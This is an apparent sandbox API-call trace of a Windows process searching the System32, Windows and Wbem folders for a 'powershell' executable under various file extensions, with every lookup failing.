	[0353.111] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.111] SetErrorMode (uMode=0x1) returned 0x1
	[0353.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.111] SetErrorMode (uMode=0x1) returned 0x1
	[0353.111] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.111] SetErrorMode (uMode=0x1) returned 0x1
	[0353.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.112] SetErrorMode (uMode=0x1) returned 0x1
	[0353.112] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.112] SetErrorMode (uMode=0x1) returned 0x1
	[0353.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.112] SetErrorMode (uMode=0x1) returned 0x1
	[0353.112] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.113] SetErrorMode (uMode=0x1) returned 0x1
	[0353.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.113] SetErrorMode (uMode=0x1) returned 0x1
	[0353.113] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.113] SetErrorMode (uMode=0x1) returned 0x1
	[0353.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.114] SetErrorMode (uMode=0x1) returned 0x1
	[0353.114] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.114] SetErrorMode (uMode=0x1) returned 0x1
	[0353.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.114] SetErrorMode (uMode=0x1) returned 0x1
	[0353.114] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.114] SetErrorMode (uMode=0x1) returned 0x1
	[0353.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.115] SetErrorMode (uMode=0x1) returned 0x1
	[0353.115] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.115] SetErrorMode (uMode=0x1) returned 0x1
	[0353.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.115] SetErrorMode (uMode=0x1) returned 0x1
	[0353.115] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.116] SetErrorMode (uMode=0x1) returned 0x1
	[0353.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.116] SetErrorMode (uMode=0x1) returned 0x1
	[0353.116] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.116] SetErrorMode (uMode=0x1) returned 0x1
	[0353.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.117] SetErrorMode (uMode=0x1) returned 0x1
	[0353.117] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.117] SetErrorMode (uMode=0x1) returned 0x1
	[0353.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.117] SetErrorMode (uMode=0x1) returned 0x1
	[0353.117] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.117] SetErrorMode (uMode=0x1) returned 0x1
	[0353.118] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.118] SetErrorMode (uMode=0x1) returned 0x1
	[0353.118] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.118] SetErrorMode (uMode=0x1) returned 0x1
	[0353.118] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.118] SetErrorMode (uMode=0x1) returned 0x1
	[0353.118] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.119] SetErrorMode (uMode=0x1) returned 0x1
	[0353.119] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.119] SetErrorMode (uMode=0x1) returned 0x1
	[0353.119] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.119] SetErrorMode (uMode=0x1) returned 0x1
	[0353.119] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.120] SetErrorMode (uMode=0x1) returned 0x1
	[0353.120] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.120] SetErrorMode (uMode=0x1) returned 0x1
	[0353.120] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.120] SetErrorMode (uMode=0x1) returned 0x1
	[0353.120] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.120] SetErrorMode (uMode=0x1) returned 0x1
	[0353.121] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.121] SetErrorMode (uMode=0x1) returned 0x1
	[0353.121] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.121] SetErrorMode (uMode=0x1) returned 0x1
	[0353.121] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.121] SetErrorMode (uMode=0x1) returned 0x1
	[0353.121] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.122] SetErrorMode (uMode=0x1) returned 0x1
	[0353.122] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.122] SetErrorMode (uMode=0x1) returned 0x1
	[0353.122] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.122] SetErrorMode (uMode=0x1) returned 0x1
	[0353.122] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.122] SetErrorMode (uMode=0x1) returned 0x1
	[0353.123] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.123] SetErrorMode (uMode=0x1) returned 0x1
	[0353.123] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.123] SetErrorMode (uMode=0x1) returned 0x1
	[0353.123] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.123] SetErrorMode (uMode=0x1) returned 0x1
	[0353.123] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.124] SetErrorMode (uMode=0x1) returned 0x1
	[0353.124] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.124] SetErrorMode (uMode=0x1) returned 0x1
	[0353.124] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.124] SetErrorMode (uMode=0x1) returned 0x1
	[0353.125] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.125] SetErrorMode (uMode=0x1) returned 0x1
	[0353.125] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.125] SetErrorMode (uMode=0x1) returned 0x1
	[0353.125] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.125] SetErrorMode (uMode=0x1) returned 0x1
	[0353.126] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.126] SetErrorMode (uMode=0x1) returned 0x1
	[0353.126] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.126] SetErrorMode (uMode=0x1) returned 0x1
	[0353.126] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.126] SetErrorMode (uMode=0x1) returned 0x1
	[0353.126] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.127] SetErrorMode (uMode=0x1) returned 0x1
	[0353.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.127] SetErrorMode (uMode=0x1) returned 0x1
	[0353.127] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.127] SetErrorMode (uMode=0x1) returned 0x1
	[0353.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.127] SetErrorMode (uMode=0x1) returned 0x1
	[0353.128] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.128] SetErrorMode (uMode=0x1) returned 0x1
	[0353.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.128] SetErrorMode (uMode=0x1) returned 0x1
	[0353.128] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.128] SetErrorMode (uMode=0x1) returned 0x1
	[0353.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.129] SetErrorMode (uMode=0x1) returned 0x1
	[0353.129] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.129] SetErrorMode (uMode=0x1) returned 0x1
	[0353.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.129] SetErrorMode (uMode=0x1) returned 0x1
